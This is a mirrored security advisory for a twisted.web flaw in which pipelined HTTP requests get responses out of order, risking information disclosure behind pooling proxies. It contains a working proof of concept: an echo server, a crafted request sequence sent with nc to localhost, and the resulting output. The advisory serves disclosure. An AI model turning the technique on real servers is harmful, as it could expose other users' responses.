Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-c8m8-j448-xjx7: twisted.web has disordered HTTP pipeline response

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

  1. Start a fresh Debian container:
docker run --workdir /repro --rm -it debian:bookworm-slim
  1. Install twisted and its dependencies:
apt -y update && apt -y install ncat git python3 python3-pip \
    && git clone --recurse-submodules https://github.com/twisted/twisted \
    && cd twisted \
    && pip3 install --break-system-packages .
  1. Run a twisted.web HTTP server that echos received requests’ methods. e.g., the following:
from twisted.web import server, resource
from twisted.internet import reactor

class TheResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request) -> bytes:
        return b"GET"

    def render_POST(self, request) -> bytes:
        return b"POST"

site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()
  1. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
  1. Observe that the responses arrive out of order:
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html

POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html

GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html

POST

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

ghsa
#web#debian#git#docker

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

  1. Start a fresh Debian container:

docker run --workdir /repro --rm -it debian:bookworm-slim

  1. Install twisted and its dependencies:

apt -y update && apt -y install ncat git python3 python3-pip \ && git clone --recurse-submodules https://github.com/twisted/twisted \ && cd twisted \ && pip3 install --break-system-packages .

  1. Run a twisted.web HTTP server that echos received requests’ methods. e.g., the following:

from twisted.web import server, resource from twisted.internet import reactor

class TheResource(resource.Resource): isLeaf = True

def render\_GET(self, request) \-> bytes:
    return b"GET"

def render\_POST(self, request) \-> bytes:
    return b"POST"

site = server.Site(TheResource()) reactor.listenTCP(80, site) reactor.run()

  1. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:

(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n’; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n’; sleep 1) | nc localhost 80

  1. Observe that the responses arrive out of order:

    HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:41 GMT Content-Length: 5 Content-Type: text/html

    POST HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 4 Content-Type: text/html

    GET HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 5 Content-Type: text/html

    POST

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

References

  • GHSA-c8m8-j448-xjx7
  • https://nvd.nist.gov/vuln/detail/CVE-2024-41671
  • twisted/twisted@046a164
  • twisted/twisted@4a930de

Related news

Ubuntu Security Notice USN-6988-2

Ubuntu Security Notice 6988-2 - USN-6988-1 fixedCVE-2024-41671 in Twisted. The USN incorrectly stated that previous releases were unaffected. This update provides the equivalent fix for Ubuntu 22.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 18.04 LTS. Ben Kallus discovered that Twisted incorrectly handled response order when processing multiple HTTP requests. A remote attacker could possibly use this issue to delay and manipulate responses. This issue only affected Ubuntu 24.04 LTS.

Debian Security Advisory 5797-1

Debian Linux Security Advisory 5797-1 - Multiple security issues were found in Twisted, an event-based framework for internet applications, which could result in incorrect ordering of HTTP requests or cross-site scripting.

Ubuntu Security Notice USN-6988-1

Ubuntu Security Notice 6988-1 - It was discovered that Twisted incorrectly handled response order when processing multiple HTTP requests. A remote attacker could possibly use this issue to delay and manipulate responses. This issue only affected Ubuntu 24.04 LTS. It was discovered that Twisted did not properly sanitize certain input. An attacker could use this vulnerability to possibly execute an HTML injection leading to a cross-site scripting attack.